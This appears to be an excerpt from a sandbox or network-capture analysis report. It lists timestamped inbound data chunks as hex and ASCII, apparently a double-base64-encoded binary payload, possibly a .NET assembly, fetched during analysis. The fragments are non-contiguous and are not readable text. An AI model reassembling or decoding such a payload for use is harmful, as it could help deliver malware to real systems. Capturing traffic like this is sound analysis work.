                                                                                                                                                                                                  2021-11-18 09:30:21 UTC44INData Raw: 00 46 00 76 00 62 00 30 00 68 00 33 00 51 00 55 00 46 00 44 00 61 00 57 00 70 00 69 00 51 00 55 00 46 00 42 00 52 00 30 00 74 00 42 00 63 00 30 00 46 00 42 00 51 00 33 00 4e 00 45 00 51 00 6b 00 46 00 56 00 54 00 30 00 4a 00 42 00 4e 00 45 00 5a 00 45 00 5a 00 31 00 6c 00 50 00 51 00 6e 00 63 00 30 00 53 00 55 00 52 00 6e 00 61 00 30 00 39 00 44 00 62 00 53 00 38 00 76 00 51 00 56 00 46 00 42 00 52 00 30 00 74 00 78 00 4e 00 45 00 4e 00 4c 00 51 00 6c 00 56 00 42 00 51 00 55 00 46 00 61 00 65 00 55 00 46 00 52 00 57 00 55 00 46 00 6a 00 53 00 45 00 70 00 61 00 51 00 6d 00 64 00 43 00 64 00 32 00 5a 00 6f 00 4e 00 45 00 46 00 42 00 51 00 57 00 39 00 76 00 53 00 48 00 64 00 42 00 51 00 55 00 4e 00 70 00 61 00 6d 00 4a 00 42 00 51 00 55 00 46 00 48 00 53 00
                                                                                                                                                                                                  Data Ascii: Fvb0h3QUFDaWpiQUFBR0tBc0FBQ3NEQkFVT0JBNEZEZ1lPQnc0SURna09DbS8vQVFBR0txNENLQlVBQUFaeUFRWUFjSEpaQmdCd2ZoNEFBQW9vSHdBQUNpamJBQUFHS
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC45INData Raw: 46 00 76 00 51 00 55 00 46 00 42 00 51 00 6b 00 4e 00 33 00 53 00 57 00 5a 00 45 00 64 00 32 00 4e 00 58 00 51 00 57 00 38 00 31 00 63 00 45 00 68 00 33 00 4f 00 56 00 70 00 4c 00 52 00 7a 00 68 00 42 00 51 00 55 00 46 00 76 00 5a 00 6b 00 56 00 4a 00 4d 00 57 00 39 00 42 00 51 00 55 00 46 00 43 00 52 00 45 00 46 00 6c 00 54 00 32 00 46 00 52 00 61 00 55 00 39 00 68 00 56 00 6d 00 31 00 4f 00 59 00 55 00 46 00 42 00 51 00 55 00 46 00 52 00 4d 00 45 00 68 00 43 00 4e 00 44 00 56 00 77 00 53 00 48 00 68 00 43 00 57 00 6b 00 4e 00 43 00 57 00 57 00 5a 00 46 00 51 00 32 00 68 00 32 00 51 00 55 00 46 00 42 00 53 00 30 00 4a 00 34 00 57 00 55 00 70 00 47 00 5a 00 32 00 56 00 50 00 59 00 56 00 46 00 70 00 54 00 32 00 46 00 57 00 61 00 32 00 39 00 69 00 64 00 30
                                                                                                                                                                                                  Data Ascii: FvQUFBQkN3SWZEd2NXQW81cEh3OVpLRzhBQUFvZkVJMW9BQUFCREFlT2FRaU9hVm1OYUFBQUFRMEhCNDVwSHhCWkNCWWZFQ2h2QUFBS0J4WUpGZ2VPYVFpT2FWa29id0
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC46INData Raw: 00 47 00 64 00 31 00 6c 00 69 00 61 00 31 00 70 00 33 00 62 00 45 00 64 00 42 00 57 00 57 00 4e 00 72 00 57 00 6e 00 64 00 73 00 52 00 31 00 46 00 5a 00 5a 00 47 00 74 00 61 00 64 00 31 00 64 00 4c 00 53 00 45 00 31 00 42 00 51 00 55 00 46 00 76 00 63 00 55 00 46 00 42 00 51 00 56 00 52 00 4e 00 51 00 56 00 6c 00 42 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 43 00 55 00 55 00 46 00 42 00 51 00 6b 00 59 00 72 00 5a 00 45 00 46 00 42 00 51 00 55 00 4e 00 6e 00 62 00 30 00 4e 00 46 00 5a 00 30 00 46 00 45 00 51 00 6b 00 4a 00 5a 00 62 00 30 00 5a 00 6e 00 51 00 55 00 46 00 43 00 61 00 58 00 64 00 48 00 59 00 7a 00 4e 00 46 00 51 00 55 00 46 00 42 00 63 00 44 00 5a 00 4c 00 53 00 46 00 56 00 42 00 51 00 55 00 46 00 76 00 52 00 6d 00 49 00 7a 00 51 00 55 00
                                                                                                                                                                                                  Data Ascii: Gd1lia1p3bEdBWWNrWndsR1FZZGtad1dLSE1BQUFvcUFBQVRNQVlBUUFBQUFCUUFBQkYrZEFBQUNnb0NFZ0FEQkJZb0ZnQUFCaXdHYzNFQUFBcDZLSFVBQUFvRmIzQU
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC48INData Raw: 49 00 5a 00 30 00 46 00 42 00 51 00 57 00 39 00 4a 00 52 00 56 00 46 00 68 00 54 00 32 00 46 00 57 00 5a 00 30 00 31 00 46 00 55 00 56 00 46 00 59 00 56 00 30 00 4a 00 4e 00 52 00 55 00 56 00 52 00 55 00 55 00 70 00 71 00 62 00 57 00 74 00 35 00 4d 00 55 00 46 00 6a 00 63 00 54 00 42 00 70 00 61 00 47 00 64 00 42 00 51 00 55 00 46 00 4c 00 53 00 48 00 64 00 35 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 68 00 52 00 4e 00 32 00 64 00 42 00 51 00 55 00 4a 00 44 00 5a 00 7a 00 4e 00 42 00 51 00 55 00 46 00 4c 00 59 00 33 00 70 00 6e 00 51 00 55 00 46 00 42 00 62 00 32 00 39 00 69 00 5a 00 30 00 46 00 42 00 51 00 32 00 64 00 4b 00 64 00 6d 00 4e 00 42 00 51 00 55 00 46 00 44 00 5a 00 30 00 31 00 46 00 53 00 30 00 4e 00 6a 00 51 00 55 00 46
                                                                                                                                                                                                  Data Ascii: IZ0FBQW9JRVFhT2FWZ01FUVFYV0JNRUVRUUpqbWt5MUFjcTBpaGdBQUFLSHd5TldnQUFBU1hRN2dBQUJDZzNBQUFLY3pnQUFBb29iZ0FBQ2dKdmNBQUFDZ01FS0NjQUF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC49INData Raw: 00 51 00 32 00 49 00 30 00 52 00 55 00 46 00 42 00 51 00 57 00 38 00 76 00 56 00 58 00 59 00 76 00 4c 00 79 00 39 00 33 00 57 00 58 00 46 00 42 00 51 00 55 00 46 00 42 00 52 00 58 00 70 00 42 00 52 00 6b 00 46 00 46 00 57 00 55 00 46 00 42 00 51 00 55 00 46 00 61 00 51 00 55 00 46 00 42 00 55 00 6d 00 4d 00 30 00 53 00 55 00 46 00 42 00 51 00 57 00 39 00 4c 00 52 00 6d 00 64 00 7a 00 63 00 6b 00 78 00 42 00 57 00 55 00 4e 00 43 00 4d 00 6a 00 68 00 75 00 51 00 55 00 46 00 42 00 53 00 30 00 46 00 33 00 59 00 30 00 52 00 69 00 4e 00 45 00 31 00 42 00 51 00 55 00 46 00 77 00 5a 00 47 00 4a 00 35 00 59 00 30 00 46 00 42 00 51 00 58 00 42 00 6f 00 61 00 6b 00 68 00 4e 00 51 00 55 00 46 00 42 00 52 00 57 00 46 00 4c 00 53 00 56 00 46 00 42 00 51 00 55 00 46 00
                                                                                                                                                                                                  Data Ascii: Q2I0RUFBQW8vVXYvLy93WXFBQUFBRXpBRkFFWUFBQUFaQUFBUmM0SUFBQW9LRmdzckxBWUNCMjhuQUFBS0F3Y0RiNE1BQUFwZGJ5Y0FBQXBoakhNQUFBRWFLSVFBQUF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC50INData Raw: 59 00 6a 00 56 00 56 00 51 00 55 00 46 00 42 00 62 00 30 00 6c 00 69 00 4e 00 56 00 6c 00 42 00 51 00 55 00 46 00 76 00 57 00 45 00 52 00 6b 00 4e 00 45 00 5a 00 4b 00 61 00 46 00 6c 00 4f 00 4d 00 32 00 64 00 42 00 53 00 6b 00 74 00 6e 00 51 00 55 00 4a 00 46 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4b 00 61 00 56 00 6c 00 42 00 51 00 56 00 56 00 51 00 51 00 55 00 46 00 42 00 51 00 6b 00 64 00 36 00 51 00 55 00 4a 00 42 00 51 00 6c 00 56 00 42 00 51 00 55 00 46 00 42 00 59 00 6b 00 46 00 42 00 51 00 56 00 4a 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 57 00 4a 00 33 00 55 00 55 00 4a 00 42 00 51 00 56 00 6c 00 4c 00 4d 00 32 00 64 00 56 00 62 00 55 00 5a 00 6e 00 63 00 6d 00 56 00 42 00 51 00 56 00 6c 00 78
                                                                                                                                                                                                  Data Ascii: YjVVQUFBb0liNVlBQUFvWERkNEZKaFlOM2dBSktnQUJFQUFBQUFBQUFKaVlBQVVQQUFBQkd6QUJBQlVBQUFBYkFBQVJBbnNDQUFBRWJ3UUJBQVlLM2dVbUZncmVBQVlx
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC52INData Raw: 00 55 00 35 00 32 00 52 00 57 00 64 00 46 00 51 00 55 00 4a 00 6e 00 63 00 6d 00 56 00 43 00 55 00 31 00 6c 00 58 00 51 00 33 00 51 00 30 00 51 00 55 00 4a 00 70 00 62 00 30 00 46 00 42 00 51 00 55 00 56 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 45 00 64 00 7a 00 68 00 42 00 51 00 6c 00 45 00 34 00 51 00 55 00 46 00 42 00 52 00 57 00 4a 00 4e 00 51 00 55 00 6c 00 42 00 52 00 6d 00 64 00 42 00 51 00 55 00 46 00 43 00 64 00 30 00 46 00 42 00 51 00 6b 00 56 00 44 00 5a 00 58 00 64 00 4a 00 51 00 55 00 46 00 42 00 55 00 55 00 52 00 69 00 64 00 32 00 74 00 43 00 51 00 55 00 46 00 5a 00 53 00 7a 00 4e 00 6e 00 56 00 57 00 31 00 47 00 5a 00 33 00 4a 00 6c 00 51 00 55 00 46 00 5a 00 63 00 55 00 46 00 42 00 51 00 55 00 4a 00 46 00
                                                                                                                                                                                                  Data Ascii: U52RWdFQUJncmVCU1lXQ3Q0QUJpb0FBQUVRQUFBQUFBQUFEdzhBQlE4QUFBRWJNQUlBRmdBQUFCd0FBQkVDZXdJQUFBUURid2tCQUFZSzNnVW1GZ3JlQUFZcUFBQUJF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC53INData Raw: 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 45 00 34 00 55 00 45 00 46 00 42 00 56 00 56 00 42 00 42 00 51 00 55 00 46 00 43 00 52 00 33 00 70 00 42 00 51 00 30 00 46 00 43 00 57 00 55 00 46 00 42 00 51 00 55 00 46 00 6a 00 51 00 55 00 46 00 42 00 55 00 6b 00 46 00 75 00 63 00 30 00 4e 00 42 00 51 00 55 00 46 00 46 00 51 00 54 00 49 00 34 00 56 00 55 00 46 00 52 00 51 00 55 00 64 00 44 00 64 00 44 00 52 00 47 00 53 00 6d 00 68 00 5a 00 53 00 7a 00 4e 00 6e 00 51 00 55 00 64 00 4c 00 5a 00 30 00 46 00 42 00 51 00 56 00 4a 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 51 00 52 00 48 00 64 00 42 00 52 00 6b 00 52 00 33 00 51 00 55 00 46 00 42 00 55 00 6e 00 4e 00 33 00 51 00 57 00 64 00 42 00 56 00 30 00 46 00 42 00 51
                                                                                                                                                                                                  Data Ascii: UFBQUFBQUE4UEFBVVBBQUFCR3pBQ0FCWUFBQUFjQUFBUkFuc0NBQUFFQTI4VUFRQUdDdDRGSmhZSzNnQUdLZ0FBQVJBQUFBQUFBQUFQRHdBRkR3QUFBUnN3QWdBV0FBQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC54INData Raw: 00 64 00 33 00 51 00 55 00 46 00 46 00 55 00 55 00 6f 00 33 00 51 00 57 00 64 00 42 00 51 00 55 00 4a 00 48 00 4f 00 46 00 70 00 42 00 55 00 55 00 46 00 48 00 52 00 6e 00 64 00 79 00 5a 00 55 00 4a 00 54 00 57 00 56 00 64 00 44 00 64 00 44 00 52 00 42 00 51 00 6d 00 6c 00 76 00 51 00 55 00 46 00 42 00 52 00 56 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 52 00 33 00 4f 00 45 00 46 00 43 00 55 00 54 00 68 00 42 00 51 00 55 00 46 00 46 00 59 00 6b 00 31 00 42 00 54 00 55 00 46 00 4a 00 51 00 55 00 46 00 42 00 51 00 55 00 4a 00 7a 00 51 00 55 00 46 00 43 00 52 00 55 00 56 00 42 00 62 00 6e 00 4e 00 44 00 51 00 55 00 46 00 42 00 52 00 55 00 45 00 79 00 4f 00 47 00 46 00 42 00 55 00 55 00 46 00 48 00 56 00 56 00 4a 00 6a 00 53 00
                                                                                                                                                                                                  Data Ascii: d3QUFFUUo3QWdBQUJHOFpBUUFHRndyZUJTWVdDdDRBQmlvQUFBRVFBQUFBQUFBQUR3OEFCUThBQUFFYk1BTUFJQUFBQUJzQUFCRUVBbnNDQUFBRUEyOGFBUUFHVVJjS
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC58INData Raw: 4e 00 45 00 64 00 57 00 51 00 55 00 46 00 42 00 51 00 6d 00 35 00 50 00 51 00 30 00 46 00 42 00 51 00 55 00 64 00 76 00 61 00 56 00 56 00 68 00 52 00 6c 00 41 00 30 00 52 00 31 00 56 00 33 00 51 00 55 00 46 00 43 00 62 00 6b 00 39 00 44 00 51 00 55 00 46 00 42 00 52 00 32 00 39 00 70 00 56 00 57 00 4a 00 47 00 55 00 44 00 52 00 48 00 56 00 6e 00 64 00 42 00 51 00 55 00 4a 00 75 00 54 00 30 00 4e 00 42 00 51 00 55 00 46 00 48 00 62 00 32 00 6c 00 70 00 53 00 6b 00 46 00 42 00 51 00 55 00 64 00 43 00 62 00 6b 00 39 00 74 00 51 00 55 00 46 00 42 00 53 00 32 00 5a 00 52 00 51 00 55 00 4a 00 42 00 51 00 56 00 46 00 76 00 61 00 47 00 64 00 42 00 51 00 55 00 4a 00 6e 00 59 00 69 00 74 00 43 00 5a 00 31 00 6c 00 44 00 51 00 55 00 46 00 61 00 65 00 6e 00 42 00 33
                                                                                                                                                                                                  Data Ascii: NEdWQUFBQm5PQ0FBQUdvaVVhRlA0R1V3QUFCbk9DQUFBR29pVWJGUDRHVndBQUJuT0NBQUFHb2lpSkFBQUdCbk9tQUFBS2ZRQUJBQVFvaGdBQUJnYitCZ1lDQUFaenB3
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC63INData Raw: 00 4c 00 54 00 6a 00 68 00 42 00 51 00 55 00 46 00 61 00 64 00 6e 00 68 00 6e 00 51 00 55 00 46 00 44 00 5a 00 33 00 4e 00 79 00 52 00 48 00 68 00 4a 00 51 00 6b 00 74 00 4e 00 59 00 30 00 46 00 42 00 51 00 57 00 39 00 4f 00 51 00 6d 00 64 00 73 00 64 00 6e 00 6c 00 42 00 51 00 55 00 46 00 44 00 61 00 45 00 6c 00 43 00 53 00 30 00 31 00 72 00 51 00 55 00 46 00 42 00 62 00 33 00 51 00 32 00 54 00 6a 00 52 00 50 00 52 00 57 00 64 00 49 00 4b 00 30 00 5a 00 70 00 57 00 55 00 46 00 42 00 51 00 6e 00 52 00 32 00 51 00 33 00 64 00 42 00 51 00 55 00 4e 00 30 00 64 00 30 00 64 00 6a 00 4e 00 56 00 6c 00 43 00 51 00 55 00 46 00 5a 00 56 00 45 00 4a 00 43 00 52 00 55 00 56 00 49 00 64 00 33 00 6c 00 4f 00 56 00 32 00 64 00 42 00 51 00 55 00 46 00 54 00 57 00 46 00
                                                                                                                                                                                                  Data Ascii: LTjhBQUFadnhnQUFDZ3NyRHhJQktNY0FBQW9OQmdsdnlBQUFDaElCS01rQUFBb3Q2TjRPRWdIK0ZpWUFBQnR2Q3dBQUN0d0djNVlCQUFZVEJCRUVId3lOV2dBQUFTWF
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC64INData Raw: 47 00 64 00 4a 00 62 00 7a 00 52 00 6e 00 51 00 55 00 46 00 43 00 62 00 54 00 6c 00 43 00 51 00 55 00 46 00 42 00 52 00 30 00 70 00 53 00 5a 00 33 00 70 00 44 00 51 00 55 00 6c 00 45 00 51 00 6b 00 4e 00 6f 00 5a 00 45 00 46 00 42 00 51 00 55 00 64 00 48 00 56 00 45 00 31 00 48 00 59 00 7a 00 59 00 77 00 51 00 55 00 46 00 42 00 63 00 44 00 5a 00 4c 00 62 00 31 00 6c 00 44 00 53 00 30 00 39 00 5a 00 51 00 55 00 46 00 42 00 57 00 6e 00 5a 00 51 00 5a 00 30 00 46 00 42 00 51 00 6d 00 6c 00 56 00 57 00 55 00 31 00 33 00 5a 00 30 00 4e 00 42 00 64 00 31 00 46 00 76 00 57 00 47 00 64 00 42 00 51 00 55 00 4a 00 6f 00 61 00 33 00 70 00 43 00 62 00 6b 00 39 00 30 00 51 00 55 00 46 00 42 00 53 00 32 00 56 00 70 00 63 00 57 00 31 00 42 00 4d 00 6a 00 6c 00 6a 00 51
                                                                                                                                                                                                  Data Ascii: GdJbzRnQUFCbTlCQUFBR0pSZ3pDQUlEQkNoZEFBQUdHVE1HYzYwQUFBcDZLb1lDS09ZQUFBWnZQZ0FBQmlVWU13Z0NBd1FvWGdBQUJoa3pCbk90QUFBS2VpcW1BMjljQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC68INData Raw: 00 63 00 55 00 46 00 42 00 51 00 55 00 74 00 69 00 4e 00 45 00 6c 00 43 00 51 00 55 00 46 00 5a 00 62 00 47 00 4d 00 32 00 63 00 30 00 46 00 42 00 51 00 58 00 42 00 32 00 5a 00 6d 00 64 00 46 00 51 00 55 00 4a 00 70 00 56 00 6e 00 70 00 78 00 5a 00 30 00 46 00 42 00 51 00 32 00 30 00 72 00 54 00 55 00 46 00 52 00 51 00 55 00 64 00 4b 00 57 00 45 00 30 00 79 00 51 00 55 00 46 00 42 00 53 00 32 00 49 00 30 00 57 00 55 00 4a 00 42 00 51 00 56 00 6c 00 73 00 59 00 7a 00 5a 00 76 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 70 00 51 00 55 00 56 00 42 00 51 00 6d 00 6c 00 57 00 65 00 6e 00 46 00 52 00 51 00 55 00 46 00 44 00 62 00 54 00 6b 00 79 00 51 00 56 00 46 00 42 00 52 00 30 00 70 00 59 00 54 00 33 00 46 00 42 00 51 00 55 00 46 00 4c 00 59 00 6a 00 52 00
                                                                                                                                                                                                  Data Ascii: cUFBQUtiNElCQUFZbGM2c0FBQXB2ZmdFQUJpVnpxZ0FBQ20rTUFRQUdKWE0yQUFBS2I0WUJBQVlsYzZvQUFBcHZpQUVBQmlWenFRQUFDbTkyQVFBR0pYT3FBQUFLYjR
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC72INData Raw: 74 00 50 00 53 00 55 00 46 00 42 00 51 00 56 00 70 00 32 00 5a 00 47 00 64 00 46 00 51 00 55 00 4a 00 70 00 63 00 45 00 64 00 43 00 51 00 32 00 6b 00 76 00 51 00 56 00 46 00 42 00 52 00 30 00 74 00 50 00 57 00 55 00 46 00 42 00 51 00 56 00 70 00 32 00 59 00 32 00 64 00 46 00 51 00 55 00 4a 00 70 00 63 00 46 00 4e 00 42 00 4d 00 6a 00 6c 00 6a 00 51 00 56 00 46 00 42 00 52 00 30 00 78 00 42 00 63 00 30 00 56 00 4c 00 54 00 6c 00 56 00 42 00 51 00 55 00 46 00 5a 00 62 00 33 00 6c 00 6e 00 52 00 55 00 46 00 43 00 61 00 57 00 39 00 42 00 52 00 58 00 70 00 42 00 52 00 55 00 46 00 44 00 61 00 30 00 46 00 42 00 51 00 55 00 46 00 70 00 51 00 55 00 46 00 42 00 55 00 6b 00 45 00 79 00 4f 00 57 00 56 00 42 00 55 00 55 00 46 00 48 00 54 00 45 00 4e 00 42 00 57 00 47
                                                                                                                                                                                                  Data Ascii: tPSUFBQVp2ZGdFQUJpcEdCQ2kvQVFBR0tPWUFBQVp2Y2dFQUJpcFNBMjljQVFBR0xBc0VLTlVBQUFZb3lnRUFCaW9BRXpBRUFDa0FBQUFpQUFBUkEyOWVBUUFHTENBWG
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC76INData Raw: 00 6d 00 56 00 42 00 51 00 6b 00 56 00 46 00 59 00 6e 00 64 00 33 00 51 00 55 00 46 00 42 00 62 00 7a 00 5a 00 59 00 55 00 43 00 38 00 76 00 4c 00 7a 00 6b 00 30 00 54 00 55 00 56 00 52 00 55 00 58 00 4e 00 43 00 65 00 45 00 56 00 46 00 59 00 6e 00 64 00 7a 00 51 00 55 00 46 00 42 00 63 00 6d 00 4d 00 7a 00 5a 00 30 00 31 00 74 00 4d 00 32 00 64 00 42 00 53 00 55 00 59 00 78 00 5a 00 30 00 31 00 44 00 51 00 57 00 56 00 50 00 59 00 56 00 51 00 34 00 62 00 53 00 38 00 76 00 4c 00 79 00 38 00 7a 00 5a 00 30 00 31 00 74 00 4d 00 32 00 64 00 42 00 52 00 30 00 74 00 6e 00 52 00 6b 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 64 00 46 00 51 00 56 00 4a 00 78 00 59 00 30 00 46 00 42 00 64 00 7a 00 68 00 42 00 51 00 55 00 46 00 46 00 51 00 55 00 46 00 44 00
                                                                                                                                                                                                  Data Ascii: mVBQkVFYnd3QUFBbzZYUC8vLzk0TUVRUXNCeEVFYndzQUFBcmMzZ01tM2dBSUYxZ01DQWVPYVQ4bS8vLy8zZ01tM2dBR0tnRkFBQUFBQUdFQVJxY0FBdzhBQUFFQUFD
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC80INData Raw: 69 00 65 00 48 00 64 00 42 00 51 00 55 00 46 00 76 00 56 00 45 00 52 00 45 00 61 00 58 00 4a 00 42 00 51 00 55 00 46 00 42 00 52 00 56 00 46 00 34 00 64 00 6b 00 68 00 52 00 51 00 55 00 46 00 44 00 61 00 45 00 31 00 52 00 52 00 56 00 4a 00 43 00 65 00 6b 00 6c 00 6e 00 51 00 55 00 46 00 44 00 61 00 45 00 31 00 53 00 52 00 56 00 4a 00 47 00 64 00 6a 00 4a 00 42 00 51 00 55 00 46 00 44 00 61 00 46 00 70 00 78 00 55 00 47 00 39 00 5a 00 51 00 55 00 46 00 42 00 51 00 56 00 4a 00 46 00 56 00 79 00 39 00 5a 00 51 00 55 00 46 00 42 00 53 00 30 00 56 00 52 00 5a 00 33 00 64 00 6c 00 64 00 32 00 4e 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 45 00 79 00 62 00 33 00 5a 00 6a 00 61 00 45 00 56 00 53 00 59 00 6e 00 6c 00 4e 00 51 00 55 00 46 00 42 00 63 00 48 00 5a
                                                                                                                                                                                                  Data Ascii: ieHdBQUFvVEREaXJBQUFBRVF4dkhRQUFDaE1RRVJCeklnQUFDaE1SRVJGdjJBQUFDaFpxUG9ZQUFBQVJFVy9ZQUFBS0VRZ3dld2NnQUFBZ0Eyb3ZjaEVSYnlNQUFBcHZ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC84INData Raw: 00 46 00 42 00 51 00 32 00 67 00 34 00 59 00 55 00 74 00 47 00 53 00 55 00 46 00 42 00 51 00 58 00 42 00 35 00 65 00 48 00 64 00 4a 00 51 00 57 00 4e 00 44 00 5a 00 33 00 4a 00 42 00 51 00 55 00 46 00 4c 00 5a 00 6d 00 67 00 30 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 49 00 64 00 30 00 46 00 42 00 51 00 32 00 67 00 34 00 59 00 30 00 74 00 47 00 53 00 55 00 46 00 42 00 51 00 58 00 42 00 35 00 65 00 48 00 64 00 4a 00 51 00 57 00 4e 00 44 00 5a 00 33 00 4a 00 42 00 51 00 55 00 46 00 4c 00 5a 00 6d 00 67 00 30 00 51 00 55 00 46 00 42 00 63 00 48 00 5a 00 49 00 64 00 30 00 46 00 42 00 51 00 32 00 68 00 6c 00 54 00 6c 00 64 00 6e 00 51 00 55 00 46 00 42 00 55 00 31 00 56 00 58 00 53 00 44 00 46 00 35 00 5a 00 47 00 49 00 32 00 51 00 55 00 46 00 42 00 51 00
                                                                                                                                                                                                  Data Ascii: FBQ2g4YUtGSUFBQXB5eHdJQWNDZ3JBQUFLZmg0QUFBcHZId0FBQ2g4Y0tGSUFBQXB5eHdJQWNDZ3JBQUFLZmg0QUFBcHZId0FBQ2hlTldnQUFBU1VXSDF5ZGI2QUFBQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC88INData Raw: 4c 00 32 00 59 00 76 00 4c 00 7a 00 4e 00 6e 00 62 00 30 00 68 00 4d 00 51 00 56 00 6c 00 49 00 59 00 6e 00 64 00 7a 00 51 00 55 00 46 00 42 00 63 00 6d 00 4d 00 7a 00 5a 00 30 00 31 00 74 00 4d 00 32 00 64 00 42 00 52 00 30 00 74 00 6e 00 51 00 55 00 46 00 42 00 52 00 55 00 59 00 34 00 51 00 55 00 46 00 42 00 51 00 30 00 46 00 42 00 51 00 55 00 46 00 72 00 5a 00 30 00 56 00 42 00 51 00 55 00 74 00 33 00 51 00 55 00 46 00 42 00 51 00 53 00 74 00 42 00 5a 00 30 00 46 00 42 00 52 00 45 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 58 00 4e 00 33 00 51 00 55 00 46 00 42 00 53 00 6d 00 74 00 43 00 51 00 55 00 46 00 43 00 54 00 55 00 46 00 6e 00 51 00 55 00 46 00 42 00 64 00 30 00 46 00 42
                                                                                                                                                                                                  Data Ascii: L2YvLzNnb0hMQVlIYndzQUFBcmMzZ01tM2dBR0tnQUFBRUY4QUFBQ0FBQUFrZ0VBQUt3QUFBQStBZ0FBREFBQUFBQUFBQUFBQUFBQXN3QUFBSmtCQUFCTUFnQUFBd0FB
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC92INData Raw: 00 51 00 4d 00 30 00 46 00 42 00 51 00 55 00 64 00 45 00 51 00 57 00 64 00 49 00 59 00 69 00 39 00 4a 00 51 00 55 00 46 00 42 00 57 00 55 00 6c 00 49 00 62 00 7a 00 46 00 68 00 51 00 55 00 46 00 42 00 51 00 6b 00 70 00 6b 00 52 00 45 00 64 00 42 00 51 00 55 00 46 00 46 00 53 00 30 00 52 00 6a 00 51 00 55 00 46 00 42 00 63 00 48 00 70 00 50 00 51 00 55 00 46 00 42 00 51 00 32 00 35 00 4d 00 63 00 6b 00 4e 00 42 00 51 00 6e 00 64 00 6d 00 61 00 44 00 52 00 42 00 51 00 55 00 46 00 76 00 62 00 30 00 68 00 33 00 51 00 55 00 46 00 44 00 62 00 53 00 38 00 77 00 51 00 55 00 46 00 42 00 52 00 30 00 4e 00 43 00 57 00 6e 00 59 00 35 00 5a 00 30 00 46 00 42 00 51 00 6d 00 64 00 6f 00 64 00 6a 00 52 00 42 00 51 00 55 00 46 00 44 00 5a 00 31 00 70 00 36 00 4f 00 58 00
                                                                                                                                                                                                  Data Ascii: QM0FBQUdEQWdIYi9JQUFBWUlIbzFhQUFBQkpkREdBQUFFS0RjQUFBcHpPQUFBQ25MckNBQndmaDRBQUFvb0h3QUFDbS8wQUFBR0NCWnY5Z0FBQmdodjRBQUFDZ1p6OX
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC96INData Raw: 55 00 46 00 42 00 53 00 30 00 74 00 43 00 4f 00 45 00 46 00 42 00 51 00 57 00 39 00 76 00 54 00 31 00 46 00 42 00 51 00 55 00 4e 00 74 00 4c 00 33 00 6c 00 42 00 51 00 55 00 46 00 48 00 53 00 6c 00 68 00 4b 00 5a 00 55 00 52 00 42 00 51 00 6e 00 64 00 6a 00 63 00 6b 00 6c 00 4e 00 51 00 55 00 68 00 43 00 4b 00 30 00 68 00 6e 00 51 00 55 00 46 00 44 00 61 00 57 00 64 00 6d 00 51 00 55 00 46 00 42 00 53 00 30 00 74 00 43 00 5a 00 30 00 46 00 42 00 51 00 33 00 4e 00 76 00 52 00 31 00 46 00 42 00 51 00 55 00 73 00 7a 00 54 00 54 00 52 00 42 00 51 00 55 00 46 00 4c 00 59 00 69 00 39 00 52 00 51 00 55 00 46 00 42 00 57 00 57 00 78 00 47 00 62 00 53 00 38 00 79 00 51 00 55 00 46 00 42 00 52 00 32 00 49 00 72 00 51 00 55 00 46 00 42 00 51 00 58 00 4a 00 6c 00 51
                                                                                                                                                                                                  Data Ascii: UFBS0tCOEFBQW9vT1FBQUNtL3lBQUFHSlhKZURBQndjcklNQUhCK0hnQUFDaWdmQUFBS0tCZ0FBQ3NvR1FBQUszTTRBQUFLYi9RQUFBWWxGbS8yQUFBR2IrQUFBQXJlQ
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC100INData Raw: 00 59 00 55 00 46 00 42 00 51 00 55 00 4a 00 4b 00 5a 00 45 00 52 00 31 00 51 00 55 00 46 00 42 00 52 00 55 00 74 00 45 00 59 00 30 00 46 00 42 00 51 00 58 00 42 00 36 00 54 00 30 00 46 00 42 00 51 00 55 00 4e 00 70 00 61 00 48 00 56 00 42 00 51 00 55 00 46 00 4c 00 51 00 57 00 35 00 7a 00 55 00 55 00 46 00 42 00 51 00 55 00 56 00 46 00 55 00 57 00 39 00 53 00 52 00 46 00 5a 00 6e 00 55 00 6b 00 52 00 6f 00 59 00 56 00 64 00 58 00 51 00 6b 00 56 00 50 00 52 00 6a 00 56 00 61 00 57 00 55 00 56 00 52 00 4e 00 46 00 6c 00 73 00 62 00 47 00 64 00 53 00 52 00 47 00 68 00 74 00 56 00 31 00 64 00 48 00 61 00 31 00 4a 00 45 00 61 00 48 00 46 00 58 00 59 00 56 00 63 00 76 00 65 00 55 00 46 00 42 00 51 00 55 00 74 00 6d 00 55 00 32 00 64 00 42 00 51 00 55 00 46 00
